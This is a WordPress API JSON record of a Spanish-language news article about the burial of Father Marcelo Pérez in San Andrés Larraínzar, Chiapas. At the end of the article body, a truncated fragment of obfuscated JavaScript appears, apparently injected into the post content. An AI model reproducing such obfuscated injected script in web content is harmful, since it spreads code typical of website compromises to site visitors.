{"id":18499,"date":"2024-10-23T03:47:42","date_gmt":"2024-10-23T03:47:42","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=18499"},"modified":"2024-10-23T03:47:43","modified_gmt":"2024-10-23T03:47:43","slug":"sepultan-al-padre-marcelo-con-emotiva-ceremonia","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=18499","title":{"rendered":"Sepultan al padre Marcelo con emotiva ceremonia"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"720\" height=\"403\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/10\/IMG-20241022-WA0022.jpg\" alt=\"\" class=\"wp-image-18500\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/10\/IMG-20241022-WA0022.jpg 720w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/10\/IMG-20241022-WA0022-300x168.jpg 300w\" sizes=\"auto, (max-width: 720px) 100vw, 720px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez\/ Corresponsal<br>22 de octubre. San Crist\u00f3bal de Las Casas.- El patio de la parroquia de San Andr\u00e9s Larra\u00ednzar ser\u00e1 donde descansen los restos del padre Marcelo P\u00e9rez, qui\u00e9n fue sepultado con una emotiva ceremonia religiosa, d\u00f3nde cientos de feligreses, amigos y familiares se concentraron para despedir su cuerpo.<\/p>\n\n\n\n<p>Previo a darle cristiana sepultura, Monse\u00f1or Ra\u00fal Vera L\u00f3pez, obispo de la Di\u00f3cesis de Saltillo, Coahuila y presidente del Centro de Derechos Humanos Fray Bartolom\u00e9 de las Casas, ofici\u00f3 la misa de cuerpo presente, donde conden\u00f3 los hechos, sum\u00e1ndose a la exigencia de justicia.<\/p>\n\n\n\n<p>Entre vivas, l\u00e1grimas y aplausos, m\u00e1s de mil asistentes despidieron el cuerpo del sacerdote ind\u00edgena, quien fue sepultado en el interior de la parroquia de San Andr\u00e9s Ap\u00f3stol, en el municipio de San Andr\u00e9s Larra\u00ednzar.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/ Corresponsal22 de octubre. San Crist\u00f3bal de Las Casas.- El patio de la parroquia de San Andr\u00e9s Larra\u00ednzar ser\u00e1 donde descansen los restos del padre Marcelo P\u00e9rez, qui\u00e9n fue sepultado con una emotiva ceremonia religiosa, d\u00f3nde cientos de feligreses, amigos y familiares se concentraron para despedir su cuerpo. Previo a darle cristiana sepultura, Monse\u00f1or &hellip;<\/p>\n","protected":false},"author":2,"featured_media":18500,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-18499","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/18499","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=18499"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/18499\/revisions"}],"predecessor-version":[{"id":18501,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/18499\/revisions\/18501"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/18500"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=18499"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=18499"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=18499"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}